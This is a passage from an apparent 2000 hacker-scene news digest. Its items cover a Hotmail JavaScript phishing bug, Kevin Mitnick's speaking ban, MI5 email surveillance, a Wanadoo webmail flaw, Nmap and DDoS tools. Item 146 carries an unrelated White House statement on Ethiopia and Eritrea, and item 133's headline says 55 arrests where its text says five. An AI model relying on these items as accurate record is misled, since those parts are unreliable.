"The thing that I am very glad didn't happen was for the feature to go into the food chain of the operating system, browser and e-commerce sites. The boycott probably cut off a lot of the proliferation that could have happened." Intel, however, said privacy arguments were less of a factor in the decision than digital-signature technology. "The technology has moved quite quickly," Alfs said. "With digital signatures you can do a lot of the functions that we had envisioned doing with the processor serial number." Its uses could have included authenticating customers for e-commerce, secure network management and secure e-mail. Security features panned However, some security experts and privacy advocates said the chip could not really add such security features at all. "Unfortunately, it doesn't do any of these things," wrote Bruce Schneier, president of Counterpane Internet Security Inc. in a ZDNet column. "If a remote Web site queries a processor ID, it has no way of knowing whether the number it gets back is a real ID or a forged ID." Intel won't stop adding security features, however. Its current motherboard chip sets include a random-number generator, which helps strengthen software encryption on the PC. That will stay, Alfs said. Don't look for any more boycotts, however. Privacy proponents love stronger encryption. @HWA 124.0 [HNN] Another HotMail Hole Patched ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 28th contributed by William Knowles Microsoft has patched yet another HotMail hole. This one used JavaScript to launch fraudulent password entry screens to trick people into entering their passwords to their accounts. C|Net http://news.cnet.com/news/0-1005-200-1772642.html?tag Microsoft zaps Hotmail password bug By Paul Festa Staff Writer, CNET News.com April 27, 2000, 12:30 p.m. PT Microsoft has patched a Hotmail bug that left users of the Web-based email service vulnerable to a password-stealing trick. 
The exploit was the latest in a series devised by bug hunters using JavaScript to launch fraudulent password entry screens to trick people into handing over control of their accounts. JavaScript is a Web scripting language designed to take actions on a Web site visitor's computer, such as launching a new window or scrolling text across the screen, without the visitor's interaction.

After the first few password-stealing schemes came to light, Hotmail and other Web email providers decided to filter JavaScript from incoming messages. But bug hunters have kept themselves busy finding ways to sneak the code around Hotmail's filters.

In the example addressed by Hotmail this week, Bulgarian bug hunter Georgi Guninski demonstrated a way to inject JavaScript through a style tag. The exploit worked only with Microsoft's Internet Explorer browser.

In response to news of the bug, Microsoft this week patched the Hotmail servers.

@HWA

125.0 [HNN] Iron Feather Collection at Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 28th

contributed by ifj

On April 23rd, Iron Feather and his wife Hanna Banana were fined at an I-80 weigh station for transporting over 7,000 pounds of underground zines. The weight of the printed material, the largest collection of underground magazines in the world, caused their truck to be severely overweight. Iron Feather & Hanna were detained until a $300 penalty could be paid and the 7,000 pounds could be offloaded. Since their collection is considered one of the nation's top archives of underground zines they hope to retrieve the impounded storage from Nebraska this summer.

Iron Feather said, "Even though we lost our savings on fines and we had to store the huge collection of underground publications at a Nebraska locker we will not let them or anyone impair our mission, to preserve & report on the cybertekpunk cultures."
Iron Feather Journal
http://ironfeather.com

@HWA

126.0 [HNN] Rubicon This Weekend, H2K Announcement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 28th

contributed by RijiLV and macki

The con in MotorCity, Rubicon, will be taking place this weekend. They will be having speakers such as Richard Thieme, Tim Crothers, TDYC!, Peter Stephenson and others.

Rubi-con

H2K KEYNOTE SPEAKER

Hope2000 has announced that their keynote speaker will be Jello Biafra, former lead singer of the Dead Kennedys and currently with Lard. Over the years, Jello has become an outspoken critic of censorship and the mass stupidity that embraces our culture. It's a world those in the hacker community are quite familiar with. The keynote is scheduled for Saturday, July 15 at noon. H2K will run from July 14-16, 2000.

Hope 2000 HNN Cons Page
http://www.rubi-con.org
http://www.h2k.net

@HWA

127.0 [HNN] Laptop Issues Justice in Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 28th

contributed by Zorro

A Visual Basic software program known as 'Electronic Judge' is being used on the streets of Brazil to assist in dispensing justice. The software is installed on a laptop carried by a real judge who can then use the software to help assess the situation and even issue sentences on the spot. The software is currently being tested by three judges in Espirito Santo in Brazil.

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_726000/726837.stm

Wednesday, 26 April, 2000, 18:02 GMT 19:02 UK

Laptop is cyber judge and jury

An artificial-intelligence program called the Electronic Judge is dispensing justice on the mean streets of Brazilian cities.

The program is installed on a laptop carried by a roaming human judge and helps to assess swiftly and methodically witness reports and forensic evidence at the scene of an incident. It then issues on-the-spot fines and can even recommend jail sentences.
I know that this is a little bit different, but it works Judge Pedro Valls Feu Rosa The software is being tested by three judges in the state of Espirito Santo. It is part of a scheme called Justice-on-Wheels, which is designed to speed up Brazil's overloaded legal system by dealing immediately with straightforward cases. Most people are happy to have the matters sorted out on the spot, says the program's creator, Judge Pedro Valls Feu Rosa, who sits in the state's Supreme Court of Appeals. He adds that the idea is not to replace judges but to make them more efficient. Pure logic After police alert the rapid justice team to minor accidents, they can be on the scene within 10 minutes. Most cases require only simple questions and no interpretation of the law - the decision-making process is purely logical, Judge Feu Rosa claims in New Scientist magazine. The program, written in the Visual Basic language, presents the judge with multiple choice questions, such as "Did the driver stop at the red light?" or "Had the driver been drinking alcohol above the acceptable limit of the law?" The Electronic Judge asks questions . . . These sorts of questions need only yes or no answers, says Judge Feu Rosa: "If we are concerned with nothing more than pure logic, then why not give the task to a computer?" He notes that the program gives more than a simple judgement: it also prints out its reasoning. If the human judge disagrees with the decision it can simply be overruled. He admits, however, that some people who have been judged by the program do not realise that they have been tried by software. . . . . and then delivers judgement. It could be some time before a similar system takes the place of an English court. "It would have to satisfy the authorities that it was absolutely foolproof first," says a spokesman for the Lord Chancellor's office, which oversees courts in England and Wales. 
But it could be put to use in the US, where Judge Feu Rosa says he is in discussion with insurance companies to set up a mobile system to resolve disputes over traffic accidents.

@HWA

128.0 [HNN] CCPA and ECPA not Applicable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 28th

contributed by project3

Kevin Giger of Highland, Illinois, was charged in Madison County Circuit Court this week with computer tampering. Giger is accused of altering the Web site of the Holiday Inn Express in Highland. Giger's bail has been set at $15,000. The interesting part of this case is the court's orders to the cable company which provided Internet access for Mr. Giger. It is hard to interpret the legalese but it would seem that the court in this case felt that the "Electronic Communications Privacy Act," 18 U.S.C. 2703 and the "Cable Communications Policy Act," 47 U.S.C. 551 for some reason did not apply.

Highland Third Judicial Circuit Madison County, Illinois
http://dreamwater.com/highland/
http://www.dreamwater.com/highland/order.htm

@HWA

129.0 [HNN] McAfee Redefines Trojan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

April 28th

contributed by medic

A Trojan or Trojan Horse has traditionally been a piece of software that executes malicious code while looking benign. Now a denial of service tool has been labeled a 'Trojan virus' by McAfee. While the software in question can potentially be malicious, that is its intended purpose, it is not trying to hide anything. This willful morphing of definitions by vendors makes it a little difficult for the rest of us.

NAI
http://vil.nai.com/villib/dispvirus.asp?virus_k

@HWA

130.0 [HNN] Mitnick Back in Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 1st

contributed by Macki

The federal probation department has notified Kevin Mitnick's probation officer that Kevin can no longer give lectures relating to technology issues. Kevin feels that this is a direct violation of his first amendment rights.
The Associated Press has quoted a figure of $20,000 worth of speaking engagements scheduled through August. Mitnick and his lawyer, Los Angeles criminal defense lawyer Sherman Ellison, will attempt to convince Judge Pfaelzer that Kevin should be allowed to speak. Associated Press Security Focus C|Net - Interview with Mitnick Regarding this latest government tactic http://dailynews.yahoo.com/h/ap/20000428/tc/computer_hacker_1.html http://www.securityfocus.com/news/23 http://news.cnet.com/news/0-1005-200-1781398.html?tag Mitnick Muzzled Ex-hacker plans his return to court after his ban on computing is extended to speaking and writing. By Kevin Poulsen April 25, 2000 2:13 AM PT Kevin Mitnick has been yanked off the lecture circuit and ordered by the U.S. Probation Office to halt his professional writing efforts, a move that left a recent Salt Lake City computer conference without its star speaker, and magazine publisher Steven Brill short one media critic for his upcoming web offering. "In regards to the numerous requests you have received concerning writing and critiquing articles and speaking at conferences, we find it necessary to deny your participation and recommend that you pursue employment in a non-related field," reads an April 12th letter to Mitnick from the Ventura, California U.S. Probation Office that supervises him. "Right now, I've retained counsel to go ahead and try to get this clarified," Mitnick said Monday. "I'm surprised, because all I was trying to do through my writing and speaking was to tell people how information security is important." Mitnick is arguably the world's most well-known hacker. His current notoriety came after he cracked a string of computers at cell phone companies, universities and ISPs. He pleaded guilty in March, 1999 to seven felonies, and was released from prison on January 21st, 2000 after nearly five years in custody. In February, Mitnick testified before a Senate committee about U.S. government computer security. 
The same month, he wrote a five-hundred-word commentary for Time Magazine opining on the high-profile denial of service attacks that briefly struck down some of the most widely used e-commerce sites on the web. 'I'm helping to protect people from the very conduct that I was once engaged in' -- Kevin Mitnick A disclaimer under his article noted that it "should not be construed as technical advice of any kind," a nod to special restrictions federal judge Marianna Pfaelzer handed Mitnick as part of a 1997 sentence for cell phone fraud. Under that ruling, Mitnick is not only banned for three years from using computers, cell phones and the Internet, but he's barred from acting "as a consultant or advisor to individuals or groups engaged in any computer related activity," without the permission of the U.S. Probation Office. Until this month, the Probation Office apparently didn't interpret that broad order -- which was upheld by an appeals court in 1998 -- as an obstacle to Mitnick's career ambitions. "I wanted to work on a book," says Mitnick. "I wanted to work in these speaking engagements and articles, and it was something that was satisfying to me and something I could do" without using computers. One source says that Mitnick had as much as $20,000 worth of speaking engagements scheduled through August, when the April 12th decision put his plans in limbo, and forced him to cancel a scheduled appearance last week on an information security panel in Salt Lake City, Utah. Brill's Discontent Mitnick said he warned organizers of the Utah NetTrends 2000 computer conference from the start that his appearance would hang on the Probation Office's approval, and he's miffed that a press release issued by the conference incorrectly claimed that a last minute court ruling caused the cancellation. 
In addition to speaking engagements, Mitnick had been entertaining more offers to write for a variety of newspapers, magazines and web sites, and had agreed to author a monthly column for Contentville, an e-commerce site set to begin reviewing and selling books and magazines this summer. "I wanted Kevin to write about consumer computer magazines," said Michael Hsu, the Contentville editor who recruited Mitnick. "His situation, where he can't touch computers or use cell phones, is unique, and I thought he could bring an interesting perspective. "From what I've been told about it, [the restriction] doesn't make any sense, and I think if he has the legal resources he should be able to challenge it successfully," said Steven Brill, Editor in Chief of the media watchdog magazine Brill's Content, and founder of Contentville. Brill said it's one thing to prevent a defendant from profiting from his crimes... "It's quite another thing to say he can't talk to anyone about anything. It just doesn't make any sense," said Brill, who still holds some hope that Mitnick will be writing for Contentville. "If he is not going to be able to do it, I'd be very disappointed," "The government can impose any restrictions so long as they are reasonably related to sentencing goals, and are no more restrictive then necessary," says Eugene Volokh, a UCLA Law School professor and expert in First Amendment issues. "Off the top of my head, it's hard for me to imagine how banning him from writing about computer magazines is consistent with those goals. But I haven't heard the probation officer's point of view" Reginald Valencia, Supervising United States Probation Officer, said office confidentiality rules prevent him from commenting on the case. "Not in any shape manner or form could I discuss it," said Valencia. Volokh notes that sentencing judges and probation officers are generally afforded great discretion in imposing supervision restrictions. 
Mitnick acknowledges his chances are poor if he takes his fight up to the appellate courts, but he adds that he and his new attorney, Los Angeles criminal defense lawyer Sherman Ellison, don't plan on entering Judge Pfaelzer's courtroom sprouting case law and statutes.

"I'm helping to protect people from the very conduct that I was once engaged in," said Mitnick. "We're going to go in there and explain to the judge that this is good for the public and good for my rehabilitation."

@HWA

131.0 [HNN] MI5 To Build Email Eavesdropping Center
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 1st

contributed by Weld Pond

British security agency MI5 will be constructing a 25m email surveillance center to monitor all emails sent and received in Britain. While law enforcement will still need Home Office approval to actually read emails and other messages, officials say the center is needed in the fight against online crime. The new center will be called GTAC, Government Technical Assistance Centre, and will be operational by the end of the year.

Sunday Times
http://www.sunday-times.co.uk/news/pages/sti/2000/04/30/stinwenws01034.html

MI5 builds new centre to read e-mails on the net

Nicholas Rufford

MI5 is building a new £25m e-mail surveillance centre that will have the power to monitor all e-mails and internet messages sent and received in Britain. The government is to require internet service providers, such as Freeserve and AOL, to have "hardwire" links to the new computer facility so that messages can be traced across the internet.

The security service and the police will still need Home Office permission to search for e-mails and internet traffic, but they can apply for general warrants that would enable them to intercept communications for a company or an organisation.
The new computer centre, codenamed GTAC - government technical assistance centre - which will be up and running by the end of the year inside MI5's London headquarters, has provoked concern among civil liberties groups. "With this facility, the government can track every website that a person visits, without a warrant, giving rise to a culture of suspicion by association," said Caspar Bowden, director of the Foundation for Information Policy Research.

The government already has powers to tap phone lines linking computers, but the growth of the internet has made it impossible to read all material. By requiring service providers to install cables that will download material to MI5, the government will have the technical capability to read everything that passes over the internet.

Home Office officials say the centre is needed to tackle the use of the internet and mobile phone networks by terrorists and international crime gangs. Charles Clark, the minister in charge of the spy centre project, said it would allow police to keep pace with technology.

"Hardly anyone was using the internet or mobile phones 15 years ago," a Home Office source said. "Now criminals can communicate with each other by a huge array of devices and channels and can encrypt their messages, putting them beyond the reach of conventional eavesdropping."

There has been an explosion in the use of the internet for crime in Britain and across the world, leading to fears in western intelligence agencies that they will soon be left behind as criminals abandon the telephone and resort to encrypted e-mails to run drug rings and illegal prostitution and immigration rackets.

The new spy centre will decode messages that have been encrypted. Under new powers due to come into force this summer, police will be able to require individuals and companies to hand over computer "keys", special codes that unlock scrambled messages.
There is controversy over how the costs of intercepting internet traffic should be shared between government and industry. Experts estimate that the cost to Britain's 400 service providers will be £30m in the first year. Internet companies say that this is too expensive, especially as many are making losses.

About 15m people in Britain have internet access. Legal experts have warned that many are unguarded in the messages they send or the material they download, believing that they are safe from prying eyes.

"The arrival of this spy centre means that Big Brother is finally here," said Norman Baker, Liberal Democrat MP for Lewes. "The balance between the state and individual privacy has swung too far in favour of the state."

@HWA

132.0 [HNN] French ISP Wanadoo Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 1st

contributed by Thiebaut

French ISP Wanadoo has linked its web based email system to the IP address of its users, allowing them to read email online without requiring a password. A simple proxy server will of course allow an intruder to masquerade his IP address and read anyone's mail. There are more than 1.5 million persons that are accessing the internet with Wanadoo. This vulnerability has existed for over a month with no resolution. France Telecom, owners of Wanadoo, have said the issue concerns very few users and therefore have refused to correct the problem.

Le Virus Informatique
http://www.acbm.com/wan.html

@HWA

133.0 [HNN] Russia Arrests 55 in Credit Card Scheme
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 1st

contributed by William Knowles

Police in Moscow have arrested five people involved in an elaborate credit card scheme. The group allegedly set up a fake business with a credit card merchant account called Politshop. Then members of the group raided e-commerce vendors and placed fraudulent charges onto victims' cards from Politshop. ITAR-TASS reports that $630,000 was stolen but does not indicate how they were caught.
Associated Press - via Tampa Bay Online
http://ap.tbo.com/ap/breaking/MGII9EK5M7C.html

Url kicked the bit bucket

@HWA

134.0 [HNN] BTopenworld Suffers Information Leakage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 1st

contributed by mr.big23

BTopenworld has suffered a security leak or glitch that has published names, addresses, e-mail addresses, salary details and other personal information from consumers and business people interested in BT's ADSL products. Supposedly over three megabytes of customer data was left wide open containing the personal information of thousands of users. BTopenworld has since closed the hole and has stopped accepting additional sign ups.

The Register UK
http://www.theregister.co.uk/000427-000028.html

Url croaked on a chicken bone

@HWA

135.0 [HNN] Nmap 2.5 Released
~~~~~~~~~~~~~~~~~~~~~~~~

May 1st

contributed by fyodor

The popular network scanning tool Nmap has finally come out of beta and released version 2.5. It supports ping scanning, many port scanning techniques, and TCP/IP fingerprinting. Nmap also offers flexible target and port specification, decoy scanning, determination of TCP sequence predictability characteristics, sunRPC scanning, reverse-identd scanning, and more. Console and X-Window versions are available in source or binary form. (Best of all it is free.)

Insecure.org
http://www.insecure.org/stf/Nmap-2.50-Release.html

@HWA

136.0 [HNN] Washington State Announces CLEW Agreement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 1st

contributed by William Knowles

The Washington state Attorney General Christine Gregoire, has announced the Computer Law Enforcement of Washington agreement. The agreement will allow federal, state, and local agencies to team up to combat cyber crimes in the Pacific Northwest. Now that the agreement has been signed the group will seek $2 million from taxpayers through the U.S. Department of Justice and the Treasury to equip and expand the program.
Wired http://www.wired.com/news/politics/0,1283,35970,00.html Northwest's Plans vs. Cybercrime by Manny Frishberg 3:00 a.m. Apr. 28, 2000 PDT SEATTLE -- Federal, state, and local agencies are teaming up to combat cybercrimes in the Pacific Northwest, hoping that the joint effort will prove stronger than the abilities of individual agencies, whose resources frequently are dwarfed by the magnitude of their challenges. Washington state Attorney General Christine Gregoire, who announced the program Thursday, said she hoped it would serve as a model for law enforcement agencies around the country. The CLEW agreement, or Computer Law Enforcement of Washington, was signed by the heads of the respective agencies in early March, but was not made public until Gregoire's press conference Thursday. The program will streamline efforts to combat Internet crimes, said U.S. Attorney Kate Pflaumer, adding that a lag in technological resources only adds to cooperation problems between states and countries. "The Internet does not recognize state or even national political boundaries, so cooperation between law enforcement is imperative," she said. Starting with an agreement to cooperate and share existing resources, Gregoire said the agencies will seek $2 million from the U.S. Department of Justice and the Treasury to equip and expand the program. In addition to providing computers and technicians who can tease data out of computer systems and hard drives, the program will train law enforcement personnel to seize computers and components using methods that preserve their data. Gregoire, flanked by the area's U.S. attorney, the head of the local FBI office and the Tacoma city attorney, said she's pressing Congress to pass legislation that would clarify where a crime has been committed when a Web server is in one state and the person accessing the system is in another. 
The group also hopes to establish uniform rules for getting search warrants for Internet-based and computer data that would be respected by all the states, so that a search warrant from Washington state could be used to seize a server in Arizona, said Pierce County Prosecuting Attorney John Landenburg. With the Anarchist Cookbook home page projected onto a screen behind her, Gregoire launched into a set of statistics to illustrate the scale of the problem. Eighty-five percent of all Internet bulletin board traffic is dedicated to hacking, software piracy, or sex, Gregoire said, citing a New York Times article. In a recent FBI study of Fortune 500 companies, reported losses from computer crime between 1997 and 1999 exceeded $360 million, and 62 percent of those companies reported a computer security breach within the last year, she added. Landenburg, who's assembled a computer forensics lab for his area, said he was concerned that 37 out of 38 jurisdictions in the state don't have the resources to follow Tacoma's lead. Landenburg said he still has problems keeping up with the pace of change in the computer industry. "Every year we have to go out and replace our equipment" to match that of the people the lab is investigating, he said. In another component to the program, the University of Washington will help out with a new Web-based center to handle consumer complaints and mediate e-commerce disputes, Gregoire said. @HWA 137.0 [HNN] New York Times Links to DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by Macki The New York Times has linked directly to the 2600 list of sites which currently house the DeCSS code. This action is similar to that for which the MPAA is currently suing several webs sites. 
2600 New York Times
http://www.2600.com/news/2000/0428.html
http://www10.nytimes.com/library/tech/00/04/cyber/cyberlaw/28law.html

@HWA

138.0 [HNN] More E-zines
~~~~~~~~~~~~~~~~~~

May 1st

contributed by xellent55 and k-rad-bob

b0g has released its fourth issue. SWAT Magazine, the UK's longest running underground magazine, has released issue 28.

b0g Swat Team
http://www.b0g.org
http://www.swateam.org

139.0 [HNN] mStream Joins Trinoo, TFN and Stacheldraht
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 2nd

contributed by William Knowles

A new tool has joined the ranks of the old standbys in distributed DoS attacks. Now not only are there Trinoo, TFN and Stacheldraht tools, there is mStream. mStream was recently discovered on a compromised Linux system in the wild. Initial analysis shows the program to be in the early stages of development however it has the potential to be much more powerful than existing tools.

C|Net Security Focus - Source code analysis of mStream
http://news.cnet.com/news/0-1003-200-1798064.html?tag
http://www.securityfocus.com/templates/archive.pike?list

@HWA

140.0 [HNN] Phrack 56 Released
~~~~~~~~~~~~~~~~~~~~~~~~

May 2nd

contributed by wizdumb

One of the oldest and most respected underground e-zines has released its 56th issue. Phrack 56 has articles on Bypassing StackGuard and StackShield, Smashing C++ VPTRs, Anomaly Detection Model for IDS and much much more with all your old favorite columns like Loopback and Line Noise. (OK, who remembers what line noise rea*ly %ad*&% >< {|]!~ ~!!)

Phrack
http://www.phrack.com/

@HWA

141.0 [HNN] Tech Crimes Get Double Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 2nd

contributed by acopalyse

The U.S. Sentencing Commission has sent guidelines to Congress that would substantially increase penalties for such crimes as credit card and identity theft, using computers to solicit or sexually exploit minors and violating copyrights or trademarks online.
The new guidelines would effectively double many of the existing penalties. The guidelines are slated to take effect November 1, 2000. MSNBC http://www.msnbc.com/news/401964.asp Dead url @HWA 142.0 [HNN] Numbers Numbers Who has the Numbers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 2nd contributed by root66 So how many attempted cyber attacks do DOD computers fend off each year? Depends on who you listen to and what you call an attack I guess. It would appear that some officials don't know the difference between a network query and an attempted intrusion. It would seem from the numbers that attacks (network queries, intrusions, ???) against DOD ranged somewhere between 58 and 250,000 for 1999. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0501/intercepts-05-01-00.asp Intercepts BY Dan Verton 05/01/2000 The Hacker Equation My mobile listening posts have discerned a confusing pattern of reports on the number of hacker "attacks" launched against the Defense Department each year. It started out simple enough: Early last year, Air Force Maj. Gen. John "Soup" Campbell, commander of the Joint Task Force for Computer Network Defense, placed the number of "attacks" against DOD networks at 250,000 each year. But in November 1999, Lt. Gen. David Kelley, director of the Defense Information Systems Agency, talked about a 300 percent increase in the number of "unauthorized intrusions." Intrusions skyrocketed, according to Kelley, from 5,844 in 1998 to 18,433 through November 1999. (Campbell reported last week that this number topped off at 22,144 for all of 1999.) This year the numbers got more complicated. In March, Lt. Col. LeRoy Lundgren, program manager for the Army’s National Security Improvement Program, said the Army alone denied as many as 285,000 network queries last year because of questionable methods used in the queries. The Interceptor guesses "network queries" are somehow similar to "attacks." Enter the Justice Department. 
According to Justice, the number of hacking cases throughout the government nearly doubled last year, reaching 1,154, up from 547 in 1998. One look at these numbers and you have to wonder if these guys even know that DOD is part of the federal government. Then, of course, there are "incidents" and "intrusions" to deal with. Lt. Gen. William Campbell, the Army’s chief information officer, last week told a crowd at the Association of the U.S. Army’s annual symposium on information assurance and battlefield visualization that the Army experienced 3,077 "incidents" during fiscal 1999 and 58 "intrusions." For fiscal 2000, those numbers had reached 2,230 and 40, respectively, by April 4. But "Soup" Campbell told the same crowd that in fiscal 1998 a total of 5,844 incidents were reported to the Pentagon by DOD commands. In fiscal 1999, that number reached 22,144, and during the first three months of this year, that number had already surpassed 5,993, Campbell said. Confused? I am. Serving Campbell Soup at the CIA "Soup" Campbell told the Interceptor last week that he’s received orders to report in June to CIA headquarters, where he will take over as the director of military support. Speaking at the AUSA symposium, Campbell also said the JTF-CND recently added legal counsel to its official structure. "I never thought I’d need a lawyer to do my business," Campbell said, referring to the lack of legal guidelines governing computer network attack and defense. Hey, don’t knock it, Soup. Legal counsel is highly underrated in this world of error-prone databases and outdated hard-copy maps. Fortunately, I hear that there’s no shortage of lawyers in Langley, Va. Go West, Young Man My E-Ring listening post in the heart of the Pentagon has picked up several low-level signals indicating that Paul Brubaker, the Defense Department’s acting deputy chief information officer, plans to leave his position in a matter of weeks. 
A strong supporter of the Navy/Marine Corps Intranet proposal, Brubaker has apparently succumbed to "dot-com fever," according to sources, and will be zapping himself out to the West Coast after he checks out of DOD. One N/MCI insider said he hoped the move "is not a harbinger of the future" for the beleaguered program.

Intercept something? Send it to the Interceptor at antenna@fcw.com.

@HWA

143.0 [HNN] Password Thief in Hong Kong Behind Bars
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 2nd

contributed by Evil Wench

Cheng Tsz-chung, 22, was behind bars last night after changing the password on another user's account and then demanding HK$500 to change it back. The victim paid the money and then contacted police. It is unknown how Police tracked down Mr. Cheng. He has pleaded guilty to one charge of unauthorized access to a computer and two counts of theft. The magistrate remanded Cheng in custody and said his sentence, which will be handed down on May 10 pending reports, must have a deterrent effect. Cheng's lawyer told the Magistrate that his client committed the offenses "just for fun". (The just for fun defense? That's a new one.)

South China Morning Post
http://www.technologypost.com/internet/DAILY/20000427134721295.asp?Section

Published on Thursday, April 27, 2000

INTERNET

Hacker demanded HK$500 for chatroom password

ELAINE PAK LI

A computer hacker was behind bars last night after breaking into a man's on-line chatroom account, changing his password and demanding HK$500 to change it back.

When Lee Kei, 21, found that his account's password had been changed by computer technician Cheng Tsz-chung in July last year, he opened another account to enter the chatroom and discuss the matter with the hacker, Eastern Court heard.
During their on-line exchanges, Cheng, 22, tested Mr Lee's computer knowledge by asking him several complicated questions, none of which Mr Lee could answer, the court heard. Cheng then refused to release Mr Lee's account, instead offering to sell it back to him.

The victim deposited $500 into Cheng's bank account the next day and reported the matter to police. Cheng was arrested in March when he was coincidently stopped and searched by a police officer in Tsim Sha Tsui, the court heard. He pleaded guilty to one charge of unauthorised access to a computer and two counts of theft.

Cheng's lawyer told Magistrate Ian Candy that his client, who had no previous criminal record, committed the offences "just for fun". Mr Candy said: "Not only did you break into another person's account and use it yourself, you even asked for money when you were discovered." The magistrate remanded Cheng in custody and said his sentence, which will be handed down on May 10 pending reports, must have a deterrent effect.

@HWA

144.0 [HNN] FMA and SM Release CD
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 2nd
contributed by Nick

Freaks Macintosh Archives and Secure Mac have teamed up to create the most up to date CD filled with Macintosh security and hacking related tools in existence. The CD combines the old Whacked Mac Archives with the new archives of Securemac.com and freaky.staticusers.net. All for only $20.

Secure Mac
http://www.securemac.com/securemacfma.html

Freaks Macintosh Archives
http://freaky.staticusers.net/

@HWA

145.0 [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 3rd
contributed by Rapier311

Metallica claims that it has discovered the names of 335,435 individuals who have used Napster to trade their songs. The band hired 'NetPD' to do the research over the weekend to come up with the names. Metallica plans to offer the names to Napster first before adding them into the lawsuit.
(Be interesting to know how NetPD came up with that list and how accurate it is.)

C|Net
http://technews.netscape.com/news/0-1005-200-1798138.html?tag

@HWA

146.0 [HNN] President Sets GPS to Full Force
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 3rd
contributed by Maggie

The Global Positioning System has been purposely crippled for civilian use since its inception. Now President Clinton has decided that civilians should get the same use of GPS as the military by disabling the degradation of the signal or Selective Availability. Degradation of the civilian signal was originally to prevent foreign nations from having the same advantage as us but the US has demonstrated the capability to selectively deny GPS signals on a regional basis during times of conflict so the Selective Availability is no longer necessary. The removal of Selective Availability will increase Civilian GPS accuracy from 100 to 10 or 20 meters. (Wow, this should mean some real cool GPS products should hit the market soon.)

The White House
http://www.whitehouse.gov/library/PressReleases.cgi?date

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0501/web-gps-05-02-00.asp

June 18, 2000

STATEMENT BY THE PRESIDENT

Forwarded by Megan C. Moloney/WHO/EOP on 06/18/2000 09:07 AM

Megan C. Moloney
06/18/2000 09:07:12 AM

Record Type: Record

To:
cc:
Subject: Statement by the President: Ethiopia and Eritrea

THE WHITE HOUSE
Office of the Press Secretary

For Immediate Release
June 18, 2000

STATEMENT BY THE PRESIDENT

Today in Algiers, Ethiopia and Eritrea signed an agreement to cease hostilities. This is a breakthrough which can, and should end the tragic conflict in the Horn of Africa. It can, and should permit these two countries to realize their potential in peace, instead of squandering it in war.

I commend the Organization of African Unity, and especially its chair Algerian President Abdelaziz Bouteflika, for leading the negotiation of this agreement.
I am grateful to my envoy, former National Security Advisor Anthony Lake, to Assistant Secretary of State Susan Rice and to my senior advisor on African Affairs Gayle Smith for their tireless pursuit of a peaceful resolution to this conflict. The United States has supported the OAU in this effort and we will continue to do so. I have asked Tony Lake to return to Algiers to work with the OAU as we enter the next round of negotiations.

I hope this commitment by Ethiopia and Eritrea to stop the fighting also signals their commitment to build the peace. I urge them to use the next round of talks to produce a final, comprehensive, lasting agreement, so they can get on with the work of pursuing democracy and development for their people.

Ethiopia and Eritrea are America's friends. If they are ready to take the next step, we and our partners in the international community will walk with them.

# # #

Civil GPS accuracy boosted
BY Paula Shaki Trimble

What is GPS?

GPS is a system of at least 24 orbiting satellites operated by the Defense Department that provides accurate positioning and timing information to users on the ground, in the air or in space. GPS is used to guide missiles, navigate civilian aircraft and time cellular communications handoffs from one base station to another.

05/02/2000

President Clinton on Monday delivered on a 4-year-old promise to improve the accuracy of the Global Positioning System to civil users.

In a presidential directive in 1996, Clinton promised to revisit the issue of intentionally degrading the civil GPS signal in 2000. He had promised to discontinue use of the degradation capability — known as selective availability — by 2006, with an annual assessment of its continued use beginning this year.

Selective availability was deactivated at midnight on Monday, the president’s science adviser, Neal Lane, announced during a press briefing earlier in the day.
The decision came early because the Defense Department has sufficiently proven its ability to deny the GPS signal to adversaries in a specific region while maintaining availability to users elsewhere, said Arthur Money, the Pentagon’s assistant secretary of Defense for command, control, communications and intelligence.

Selective availability caused the civil GPS signal to be accurate within 100 meters. Without selective availability, users will receive position information accurate within 10 to 20 meters.

While the modification significantly improves the accuracy of the GPS signal, the Transportation Department is still committed to developing systems that augment the GPS capability, said Eugene Conti, assistant secretary of Transportation for transportation policy. Those systems, such as the Federal Aviation Administration’s Wide-Area Augmentation System and Local-Area Augmentation System and the Coast Guard’s National Differential GPS System, verify that the GPS signal is reliable.

@HWA

147.0 [HNN] New Cyber Crime Treaty Making the Rounds
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 3rd
contributed by Evil Wench

The 'Draft Convention on Cybercrime', written in part by US law enforcement is currently circulating among 40 countries for approval. If enacted the proposal would make software designed or adapted to gain access to a computer system without permission illegal, interference with the 'functioning of a computer system' by deleting or altering data, force people to give up their encryption keys, and require ISPs to collect info about their users.

Wired
http://www.wired.com/news/politics/0,1283,36047,00.html

Draft Convention on Cybercrime
http://www.politechbot.com/docs/treaty.html

Cybercrime Solution Has Bugs
by Declan McCullagh
